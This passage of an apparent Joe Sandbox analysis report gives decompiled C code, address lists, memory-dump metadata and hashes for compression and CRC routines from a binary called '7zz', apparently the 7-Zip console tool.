							_push(_t301 + 0x74);
							if(L0044B440(_t293 + 0x78) != 0) {
								_push(_t301 + 0x194);
								return L0044B590(_t293 + 0x778);
							} else {
								L35:
								return 0;
							}
						}
					} else {
						 *((char*)(__ecx + 0xd49)) = 1;
						_t165 =  *(__ecx + 0x40);
						_t239 =  ~_t165 & 0x00000007;
						 *(__ecx + 0x40) = _t165 + _t239;
						 *(__ecx + 0x70) =  *(__ecx + 0x70) >> _t239;
						 *((intOrPtr*)(__ecx + 0xd44)) = E0044A200(0x10);
						if( *((intOrPtr*)(__ecx + 0xd50)) == 0) {
							return 0 |  *((intOrPtr*)(__ecx + 0xd44)) == ( !(E0044A200(0x10)) & 0x0000ffff);
						} else {
							return 1;
						}
					}
				} else {
					return 0;
				}
				L37:
			}








































                                                                                  0x0044a44a
                                                                                  0x0044a45d
                                                                                  0x0044a463
                                                                                  0x0044a46b
                                                                                  0x0044a47c
                                                                                  0x0044a4ef
                                                                                  0x0044a4f6
                                                                                  0x0044a581
                                                                                  0x0044a58f
                                                                                  0x0044a5a2
                                                                                  0x0044a5a7
                                                                                  0x0044a5bf
                                                                                  0x0044a5c1
                                                                                  0x0044a5cd
                                                                                  0x0044a5de
                                                                                  0x0044a5cf
                                                                                  0x0044a5d8
                                                                                  0x0044a5d8
                                                                                  0x0044a5e3
                                                                                  0x0044a5e4
                                                                                  0x0044a5f4
                                                                                  0x0044a5fa
                                                                                  0x0044a5fa
                                                                                  0x0044a5fc
                                                                                  0x0044a5fe
                                                                                  0x0044a600
                                                                                  0x0044a618
                                                                                  0x0044a61e
                                                                                  0x0044a61f
                                                                                  0x0044a625
                                                                                  0x0044a627
                                                                                  0x00000000
                                                                                  0x0044a629
                                                                                  0x0044a629
                                                                                  0x0044a62b
                                                                                  0x0044a62f
                                                                                  0x0044a635
                                                                                  0x0044a63b
                                                                                  0x0044a63f
                                                                                  0x0044a644
                                                                                  0x0044a648
                                                                                  0x0044a655
                                                                                  0x0044a65d
                                                                                  0x0044a661
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0044a66a
                                                                                  0x0044a66f
                                                                                  0x0044a671
                                                                                  0x0044a671
                                                                                  0x0044a676
                                                                                  0x0044a684
                                                                                  0x0044a689
                                                                                  0x0044a690
                                                                                  0x0044a697
                                                                                  0x0044a6a0
                                                                                  0x0044a6a5
                                                                                  0x0044a6a7
                                                                                  0x0044a6a7
                                                                                  0x0044a6ae
                                                                                  0x0044a6b2
                                                                                  0x0044a6b8
                                                                                  0x0044a6c4
                                                                                  0x0044a6ce
                                                                                  0x0044a6ce
                                                                                  0x0044a6d4
                                                                                  0x0044a6da
                                                                                  0x0044a6dc
                                                                                  0x0044a6dc
                                                                                  0x0044a6a5
                                                                                  0x0044a6e0
                                                                                  0x0044a6e4
                                                                                  0x00000000
                                                                                  0x0044a6ea
                                                                                  0x0044a6ea
                                                                                  0x0044a6ec
                                                                                  0x0044a6f4
                                                                                  0x0044a6f6
                                                                                  0x0044a704
                                                                                  0x0044a70c
                                                                                  0x0044a70c
                                                                                  0x0044a70e
                                                                                  0x0044a70f
                                                                                  0x0044a714
                                                                                  0x0044a72d
                                                                                  0x0044a734
                                                                                  0x0044a74f
                                                                                  0x0044a756
                                                                                  0x0044a756
                                                                                  0x0044a758
                                                                                  0x0044a75a
                                                                                  0x0044a769
                                                                                  0x0044a769
                                                                                  0x0044a76b
                                                                                  0x0044a773
                                                                                  0x0044a776
                                                                                  0x0044a77d
                                                                                  0x0044a77d
                                                                                  0x0044a785
                                                                                  0x0044a795
                                                                                  0x0044a79f
                                                                                  0x0044a79f
                                                                                  0x00000000
                                                                                  0x0044a740
                                                                                  0x0044a740
                                                                                  0x0044a740
                                                                                  0x0044a734
                                                                                  0x00000000
                                                                                  0x0044a6e4
                                                                                  0x00000000
                                                                                  0x0044a644
                                                                                  0x00000000
                                                                                  0x0044a627
                                                                                  0x00000000
                                                                                  0x0044a5b5
                                                                                  0x0044a5be
                                                                                  0x0044a5be
                                                                                  0x0044a4f8
                                                                                  0x0044a50b
                                                                                  0x0044a50b
                                                                                  0x0044a51e
                                                                                  0x0044a51e
                                                                                  0x0044a531
                                                                                  0x0044a531
                                                                                  0x0044a533
                                                                                  0x0044a54b
                                                                                  0x0044a552
                                                                                  0x0044a552
                                                                                  0x0044a55c
                                                                                  0x0044a564
                                                                                  0x0044a7a1
                                                                                  0x0044a7a5
                                                                                  0x0044a7b0
                                                                                  0x0044a7cc
                                                                                  0x0044a7dc
                                                                                  0x0044a7b5
                                                                                  0x0044a7b5
                                                                                  0x0044a7be
                                                                                  0x0044a7be
                                                                                  0x0044a7b0
                                                                                  0x0044a47e
                                                                                  0x0044a47e
                                                                                  0x0044a485
                                                                                  0x0044a48f
                                                                                  0x0044a49a
                                                                                  0x0044a49d
                                                                                  0x0044a4a5
                                                                                  0x0044a4b3
                                                                                  0x0044a4eb
                                                                                  0x0044a4b8
                                                                                  0x0044a4c1
                                                                                  0x0044a4c1
                                                                                  0x0044a4b3
                                                                                  0x0044a470
                                                                                  0x0044a479
                                                                                  0x0044a479
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
                                                                                  • Instruction ID: 9bb6accf8b061612f2bcebb0087019938af92876cfc06ddf3499721ed1c01372
                                                                                  • Opcode Fuzzy Hash: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
                                                                                  • Instruction Fuzzy Hash: EEA107317483444BFF389E28D8513EEB7D2EBC4308F54443EDA898B781DA7AA9198756
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00458B30 Relevance: .2, Instructions: 180COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 76%
                                                                                  			E00458B30(signed char* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _t102;
				signed int _t104;
				signed int _t112;
				signed int _t123;
				intOrPtr _t132;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t149;
				unsigned int _t164;
				signed int _t165;
				signed int _t182;
				signed int _t184;
				signed int _t191;
				signed int _t198;
				signed char* _t205;
				signed int _t208;
				unsigned int _t212;
				signed int _t218;
				unsigned int _t222;

				if(__edx >= 0x10) {
					_v20 = __edx - 0x10;
					_v44 = 0;
					_t205 = __ecx;
					_v24 = _a4 - __ecx;
					do {
						_t102 = 5;
						_t208 = 0;
						_v28 =  *(( *_t205 & 0x1f) + 0x47c5bc) & 0x000000ff;
						_v32 = 5;
						_v36 = 0;
						do {
							_t182 = _v28 >> _t208;
							if((_t182 & 0x00000001) != 0) {
								_t212 = _t102 >> 3;
								_t104 = _t205[_t212 + 5] & 0x000000ff;
								asm("cdq");
								asm("cdq");
								_t136 = (_t104 << 8) + (_t205[_t212 + 4] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t138 = (_t136 << 8) + (_t205[_t212 + 3] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t140 = (_t138 << 8) + (_t205[_t212 + 2] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t142 = (_t140 << 8) + (_t205[_t212 + 1] & 0x000000ff);
								asm("adc ebp, edx");
								_t218 = (((((_t182 << 0x00000020 | _t104) << 0x8 << 0x00000020 | _t136) << 0x8 << 0x00000020 | _t138) << 0x8 << 0x00000020 | _t140) << 0x8 << 0x00000020 | _t142) << 8;
								asm("cdq");
								asm("adc ebp, edx");
								_t184 = _t218;
								_v40 = _t102 & 0x00000007;
								_v16 = (_t142 << 8) + (_t205[_t212] & 0x000000ff);
								_v12 = _t218;
								_t112 = L0046B2E0((_t142 << 8) + (_t205[_t212] & 0x000000ff), _t102 & 0x00000007, _t184);
								_t145 = _t184;
								_v8 = _t112;
								if((_t145 >> 0x00000005 & 0x0000000f) == 5 && 0 == 0 && (_t112 & 0x00000e00) == 0) {
									_t191 = ((_t145 >> 0x00000004 & 0x00000001) << 0x00000014 | (_t145 << 0x00000020 | _t112) >> 0xd & 0x000fffff) << 4;
									if(_a8 == 0) {
										_t164 = _t191 - _v44 - _a4;
									} else {
										_t164 = _v24 + _t205 + _t191;
									}
									_t165 = _t164 >> 4;
									_t198 = ((0 << 0x00000020 | _t165 & 0x00100000) << 0x3 << 0x00000020 | (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 | _t165 & 0x000fffff) << 0xd | _t145 & 0xffffffee;
									_t123 = E0046C5A0(((_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 | _t165 & 0x000fffff) << 0x0000000d | _v8 & 0x00001fff, _v40, _t198);
									asm("cdq");
									_t222 = _t198 | _t198 & _v12;
									_t149 = _t123 | (0x00000001 << _v40) - 0x00000001 & _v16;
									_t205[_t212 + 1] = (_t222 << 0x00000020 | _t149) >> 8;
									_t205[_t212] = _t149;
									_t205[_t212 + 2] = (_t222 << 0x00000020 | _t149) >> 0x10;
									_t205[_t212 + 3] = (_t222 << 0x00000020 | _t149) >> 0x18;
									_t205[_t212 + 4] = _t222;
									_t205[_t212 + 5] = _t222 >> 8;
								}
							}
							_t208 = _v36 + 1;
							_t102 = _v32 + 0x29;
							_v36 = _t208;
							_v32 = _t102;
						} while (_t208 < 3);
						_t132 = _v44 + 0x10;
						_t205 =  &(_t205[0x10]);
						_v44 = _t132;
					} while (_t132 <= _v20);
					return _t132;
				} else {
					return 0;
				}
			}



































                                                                                  0x00458b36
                                                                                  0x00458b4d
                                                                                  0x00458b51
                                                                                  0x00458b59
                                                                                  0x00458b5b
                                                                                  0x00458b60
                                                                                  0x00458b6d
                                                                                  0x00458b72
                                                                                  0x00458b74
                                                                                  0x00458b78
                                                                                  0x00458b7c
                                                                                  0x00458b80
                                                                                  0x00458b86
                                                                                  0x00458b8b
                                                                                  0x00458b95
                                                                                  0x00458b98
                                                                                  0x00458b9d
                                                                                  0x00458bae
                                                                                  0x00458bb2
                                                                                  0x00458bb9
                                                                                  0x00458bbf
                                                                                  0x00458bc3
                                                                                  0x00458bca
                                                                                  0x00458bd0
                                                                                  0x00458bd4
                                                                                  0x00458bdb
                                                                                  0x00458be1
                                                                                  0x00458be5
                                                                                  0x00458beb
                                                                                  0x00458bed
                                                                                  0x00458bf1
                                                                                  0x00458bf7
                                                                                  0x00458bfb
                                                                                  0x00458bfd
                                                                                  0x00458c01
                                                                                  0x00458c05
                                                                                  0x00458c09
                                                                                  0x00458c0e
                                                                                  0x00458c1a
                                                                                  0x00458c21
                                                                                  0x00458c5a
                                                                                  0x00458c62
                                                                                  0x00458c76
                                                                                  0x00458c64
                                                                                  0x00458c6a
                                                                                  0x00458c6a
                                                                                  0x00458c78
                                                                                  0x00458cb4
                                                                                  0x00458cb6
                                                                                  0x00458ccb
                                                                                  0x00458cd4
                                                                                  0x00458cd6
                                                                                  0x00458ce0
                                                                                  0x00458cf1
                                                                                  0x00458cfd
                                                                                  0x00458d09
                                                                                  0x00458d0d
                                                                                  0x00458d11
                                                                                  0x00458d11
                                                                                  0x00458c21
                                                                                  0x00458d1d
                                                                                  0x00458d1e
                                                                                  0x00458d21
                                                                                  0x00458d25
                                                                                  0x00458d29
                                                                                  0x00458d36
                                                                                  0x00458d39
                                                                                  0x00458d3c
                                                                                  0x00458d40
                                                                                  0x00458d51
                                                                                  0x00458b38
                                                                                  0x00458b3d
                                                                                  0x00458b3d

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                                  • Instruction ID: fa9aeb9e0725e4ffef27b0fed8173ebd3e95ce29c77f6e3ebb7612827f398593
                                                                                  • Opcode Fuzzy Hash: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                                  • Instruction Fuzzy Hash: 2C510AB2B087514BD308DE6DCC9073AB6D2EBD4304F48863EE496D3385EA78DA1987D5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00459F80 Relevance: .2, Instructions: 154COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 82%
                                                                                  			E00459F80(void* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __esi;
				unsigned int _t59;
				unsigned int _t77;
				void* _t78;
				signed int _t79;
				intOrPtr _t83;
				intOrPtr* _t92;
				void* _t107;
				intOrPtr _t120;
				intOrPtr _t121;
				unsigned int _t127;
				signed int _t128;
				intOrPtr _t129;
				void* _t130;
				intOrPtr _t132;
				intOrPtr _t133;

				_t127 = __edx;
				_t130 = __ecx;
				if(__edx <= 0xc0000000) {
					_t59 = __edx >> 1;
					if(__edx > 0x80000000) {
						_t59 = __edx >> 2;
					}
					_t132 = _a8;
					 *((intOrPtr*)(_t130 + 0x40)) = _t127 + _a4 + 1;
					 *((intOrPtr*)(_t130 + 0x44)) = _a12 + _t132;
					_t92 = _a16;
					if(E00459C90(_t92, _t130, (_a4 + _t132 + _a12 >> 1) + _t59 + 0x80000) == 0) {
						_t133 = 0;
						goto L30;
					} else {
						_t120 =  *((intOrPtr*)(_t130 + 0x48));
						 *((intOrPtr*)(_t130 + 0x1c)) = _t132;
						_t133 = 0;
						_a16 = _t127 + 1;
						 *((intOrPtr*)(_t130 + 0x60)) = 0;
						if(_t120 != 2) {
							_t77 = ((_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002) >> 0x00000004 | 0x01fffe00) >> 0x00000008 | _t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001 | (_t127 - 0x00000001 | _t127 - 0x00000001 >> 0x00000001) >> 0x00000002) >> 0x00000004) >> 1;
							if(_t77 > 0x1000000) {
								if(_t120 != 3) {
									_t77 = _t77 >> 1;
								} else {
									_t77 = 0xffffff;
								}
							}
						} else {
							_t77 = 0xffff;
						}
						 *(_t130 + 0x28) = _t77;
						_t78 = _t77 + 1;
						if(_t120 > 2) {
							 *((intOrPtr*)(_t130 + 0x60)) = 0x400;
						}
						if(_t120 > 3) {
							 *((intOrPtr*)(_t130 + 0x60)) =  *((intOrPtr*)(_t130 + 0x60)) + 0x10000;
						}
						if(_t120 > 4) {
							 *((intOrPtr*)(_t130 + 0x60)) =  *((intOrPtr*)(_t130 + 0x60)) + 0x100000;
						}
						_t79 = _t78 +  *((intOrPtr*)(_t130 + 0x60));
						_t107 =  *(_t130 + 0x64) +  *((intOrPtr*)(_t130 + 0x68));
						_t121 = _a16;
						 *((intOrPtr*)(_t130 + 0x5c)) = _t127;
						 *(_t130 + 0x64) = _t79;
						 *((intOrPtr*)(_t130 + 0x18)) = _t121;
						if( *((intOrPtr*)(_t130 + 0x54)) != _t133) {
							_t121 = _t121 + _t121;
						}
						 *((intOrPtr*)(_t130 + 0x68)) = _t121;
						_t128 = _t79 + _t121;
						if( *((intOrPtr*)(_t130 + 0x20)) == _t133 || _t107 != _t128) {
							 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
							 *((intOrPtr*)(_t130 + 0x20)) = _t133;
							if(_t128 * 4 >> 2 == _t128) {
								_t83 =  *((intOrPtr*)( *_t92))();
							} else {
								_t83 = 0;
							}
							 *((intOrPtr*)(_t130 + 0x20)) = _t83;
							if(_t83 == _t133) {
								L30:
								 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
								 *((intOrPtr*)(_t130 + 0x20)) = _t133;
								if( *((intOrPtr*)(_t130 + 0x4c)) == _t133) {
									 *((intOrPtr*)( *((intOrPtr*)(_t92 + 4))))();
									 *((intOrPtr*)(_t130 + 0x30)) = _t133;
								}
								return 0;
							} else {
								 *((intOrPtr*)(_t130 + 0x24)) = _t83 +  *(_t130 + 0x64) * 4;
								goto L28;
							}
						} else {
							L28:
							return 1;
						}
					}
				} else {
					_t129 = _a16;
					 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4))))();
					 *((intOrPtr*)(__ecx + 0x20)) = 0;
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4))))();
						 *((intOrPtr*)(__ecx + 0x30)) = 0;
					}
					return 0;
				}
			}




















                                                                                  0x00459f83
                                                                                  0x00459f85
                                                                                  0x00459f8d
                                                                                  0x00459fbe
                                                                                  0x00459fc6
                                                                                  0x00459fca
                                                                                  0x00459fca
                                                                                  0x00459fd6
                                                                                  0x00459fda
                                                                                  0x00459ff1
                                                                                  0x00459ff4
                                                                                  0x0045a000
                                                                                  0x0045a0f4
                                                                                  0x00000000
                                                                                  0x0045a006
                                                                                  0x0045a006
                                                                                  0x0045a009
                                                                                  0x0045a00c
                                                                                  0x0045a011
                                                                                  0x0045a015
                                                                                  0x0045a01b
                                                                                  0x0045a047
                                                                                  0x0045a04e
                                                                                  0x0045a053
                                                                                  0x0045a05c
                                                                                  0x0045a055
                                                                                  0x0045a055
                                                                                  0x0045a055
                                                                                  0x0045a053
                                                                                  0x0045a01d
                                                                                  0x0045a01d
                                                                                  0x0045a01d
                                                                                  0x0045a05e
                                                                                  0x0045a061
                                                                                  0x0045a065
                                                                                  0x0045a067
                                                                                  0x0045a067
                                                                                  0x0045a071
                                                                                  0x0045a073
                                                                                  0x0045a073
                                                                                  0x0045a07d
                                                                                  0x0045a07f
                                                                                  0x0045a07f
                                                                                  0x0045a089
                                                                                  0x0045a08c
                                                                                  0x0045a08f
                                                                                  0x0045a093
                                                                                  0x0045a096
                                                                                  0x0045a099
                                                                                  0x0045a09f
                                                                                  0x0045a0a1
                                                                                  0x0045a0a1
                                                                                  0x0045a0a3
                                                                                  0x0045a0a6
                                                                                  0x0045a0ae
                                                                                  0x0045a0b9
                                                                                  0x0045a0c7
                                                                                  0x0045a0cc
                                                                                  0x0045a0d6
                                                                                  0x0045a0ce
                                                                                  0x0045a0ce
                                                                                  0x0045a0ce
                                                                                  0x0045a0d8
                                                                                  0x0045a0dd
                                                                                  0x0045a0f6
                                                                                  0x0045a0fe
                                                                                  0x0045a100
                                                                                  0x0045a106
                                                                                  0x0045a110
                                                                                  0x0045a112
                                                                                  0x0045a112
                                                                                  0x0045a11b
                                                                                  0x0045a0df
                                                                                  0x0045a0e5
                                                                                  0x00000000
                                                                                  0x0045a0e5
                                                                                  0x0045a0e8
                                                                                  0x0045a0e8
                                                                                  0x0045a0f1
                                                                                  0x0045a0f1
                                                                                  0x0045a0ae
                                                                                  0x00459f8f
                                                                                  0x00459f8f
                                                                                  0x00459f9b
                                                                                  0x00459f9f
                                                                                  0x00459fa5
                                                                                  0x00459faf
                                                                                  0x00459fb1
                                                                                  0x00459fb1
                                                                                  0x00459fb9
                                                                                  0x00459fb9

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                                  • Instruction ID: fd88af4a55426da6948f54a871f8da9c8cc7ad7d325161158fb5f24926afe266
                                                                                  • Opcode Fuzzy Hash: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                                  • Instruction Fuzzy Hash: CE512B75610B098FC724CF29C48066BB3E2FB88305B148A2ED99787B86DB75E859CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004217DA Relevance: .1, Instructions: 119COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 37%
                                                                                  			E004217DA() {
				signed int _t63;
				signed int _t64;
				signed int _t114;

				_t114 = 0;
				do {
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					asm("adc esi, 0xffffffff");
					asm("adc ecx, 0xffffffff");
					_t63 =  !((( !((( !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 